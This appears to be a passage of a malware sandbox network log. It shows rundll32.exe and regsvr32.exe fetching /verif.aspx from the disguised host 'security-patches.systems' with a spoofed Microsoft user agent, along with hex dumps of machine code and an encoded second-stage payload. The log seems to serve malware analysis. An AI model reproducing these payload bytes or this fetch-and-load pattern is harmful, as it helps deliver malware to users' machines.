2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 88 a1 04 10 8b 15 8c a1 04 10 f7 d1 f7 d2 89 8d e0 fc ff ff 89 95 e4 fc ff ff 81 bd e0 fc ff ff 68 27 84 f0 75 18 81 bd e4 fc ff ff 70 c6 f4 ff 75 0c c7 85 b0 fe ff ff 01 00 00 00 eb 0a c7 85 b0 fe ff ff 00 00 00 00 8b 85 b4 fe ff ff 3b 85 b0 fe ff ff 7c 0c c7 85 ac fe ff ff 01 00 00 00 eb 0a c7 85 ac fe ff ff 00 00 00 00 8b 8d ac fe ff ff f7 d1 85 c9 74 39 8b 15 10 a1 04 10 81 c2 e2 00 00 00 a1 54 a1 04 10 03 c2 a3 54 a1 04 10 0f bf 0d 20 a1 04 10 0f bf 15 00 a1 04 10 2b ca 0f bf 05 20 a1 04 10 03 c1 66 a3 20 a1 04 10 eb 26 0f bf 4d f0 85 c9 74 1e 0f bf 15 20 a1 04 10 81 f2 28 f9 00 00 66 89 15 00 a1 04 10 a0 78 ac 04 10 a2 bc a0 04 10 8b 4d 98 51 6a 00 ff 15 44 b0 03 10 50 ff 15 3c b0 03 10 89 45 94 33 d2 c7 05 f8 a0 04 10 e0 1a c3 4f 89 15 fc a0 04 10 Data Ascii: h'upu;\|t9TT + f &Mt (fxMQjDP<E3O
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: f5 ff ff 38 00 00 00 0f b6 05 6b a0 04 10 99 89 85 5c f4 ff ff 89 95 60 f4 ff ff c7 85 84 f4 ff ff 44 fc 96 51 c7 85 88 f4 ff ff ba 21 a8 0b 8b 0d 90 a1 04 10 66 89 8d 2c fb ff ff 0f b6 05 6b a0 04 10 99 89 85 54 f4 ff ff 89 95 58 f4 ff ff c7 85 90 f4 ff ff c9 e8 4c 74 8b 15 4c a1 04 10 89 95 94 f4 ff ff c7 85 98 f4 ff ff be aa 47 50 c7 85 9c f4 ff ff a9 00 00 00 66 a1 20 a1 04 10 88 85 e2 fe ff ff c6 85 e3 fe ff ff 80 c7 85 a0 f4 ff ff e0 c4 df 6c b9 e7 8b ff ff 66 89 8d 28 fb ff ff 0f b6 55 fa 69 c2 c1 f1 bd 3b 89 45 a4 8b 0d 04 a1 04 10 2b 4d b0 8b 15 04 a1 04 10 2b d1 89 15 04 a1 04 10 a1 78 ac 04 10 89 85 d8 fe ff ff c7 85 dc fe ff ff 00 00 00 00 eb 0f 8b 8d dc fe ff ff 83 c1 01 89 8d dc fe ff ff 83 bd dc fe ff ff 63 0f 8d 4f 01 00 00 83 3d 4c a1 04 Data Ascii: 8k\`DQ!f,kTXLtLGPf lf(Ui;E+M+xcO=L
2024-12-06 21:11:11 UTC	16384	IN	Data Raw: 55 c0 52 e8 54 fe 00 00 a2 bb a0 04 10 0f be 05 17 a0 04 10 89 85 44 fd ff ff 83 bd 44 fd ff ff 04 0f 87 a2 00 00 00 8b 8d 44 fd ff ff ff 24 8d b0 1d 02 10 8a 15 78 ac 04 10 88 15 56 a0 04 10 a1 5c a1 04 10 99 05 92 2e c4 3a 81 d2 79 3c 0a 00 33 c9 03 05 7c a1 04 10 13 d1 a3 d0 a0 04 10 89 15 d4 a0 04 10 eb 61 0f b6 45 fe 99 a3 30 a1 04 10 89 15 34 a1 04 10 8b 55 98 2b 55 d8 8b 45 9c 1b 45 dc 89 55 98 89 45 9c eb 3d 8b 4d d0 8b 55 d4 a1 64 a1 04 10 2b 0d 60 a1 04 10 1b d0 89 4d d0 89 55 d4 eb 22 0f b6 0d 6b a0 04 10 0f be 15 17 a0 04 10 0f af ca 88 4d ff eb 0c 33 c0 c7 45 d8 a4 50 00 00 89 45 dc c7 85 28 ff ff ff 00 00 00 00 eb 0f 8b 8d 28 ff ff ff 83 c1 02 89 8d 28 ff ff ff 81 bd 28 ff ff ff f5 01 00 00 0f 8d 89 00 00 00 0f b6 55 fa 0f be 05 17 a0 04 10 Data Ascii: URTDDD$xV\.:y<3\|aE04U+UEEUE=MUd+`MU"kM3EPE((((U
2024-12-06 21:11:11 UTC	16384	IN	Data Raw: ff ff 3b 4d c0 77 19 72 0b 8b 95 58 fe ff ff 3b 55 bc 77 0c c7 85 e4 fe ff ff 01 00 00 00 eb 0a c7 85 e4 fe ff ff 00 00 00 00 8b 85 e8 fe ff ff f7 d0 3b 85 e4 fe ff ff 74 0c c7 85 d4 fe ff ff 01 00 00 00 eb 0a c7 85 d4 fe ff ff 00 00 00 00 8b 8d dc fe ff ff f7 d1 0f af 8d d8 fe ff ff 8b 95 d4 fe ff ff f7 d2 3b ca 7c 39 0f b7 05 cc a0 04 10 8b 0d 28 a1 04 10 2b c8 89 0d 28 a1 04 10 8b 15 58 a1 04 10 33 c0 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 56 51 50 52 e8 bf bd 00 00 a3 58 a1 04 10 eb 15 8b 55 b4 8b 45 b8 89 85 d4 fd ff ff 81 f2 3d 28 95 df 89 55 a8 e9 84 00 00 00 0f b7 4d ec 85 c9 75 0c c7 85 50 ff ff ff 01 00 00 00 eb 0a c7 85 50 ff ff ff 00 00 00 00 8b 15 04 a1 04 10 03 95 50 ff ff ff 33 c0 89 15 c0 a0 04 10 a3 c4 a0 04 10 8b 0d 54 a1 04 10 33 d2 8b 45 Data Ascii: ;MwrX;Uw;t;\|9(+(X35VQPRXUE=(UMuPPP3T3E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	185.234.216.175	443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:12 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:13 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:11:13 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:11:13 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:11:14 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:11:14 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:11:14 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	185.234.216.175	443	6204	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:15 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:15 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:11:15 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:11:15 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 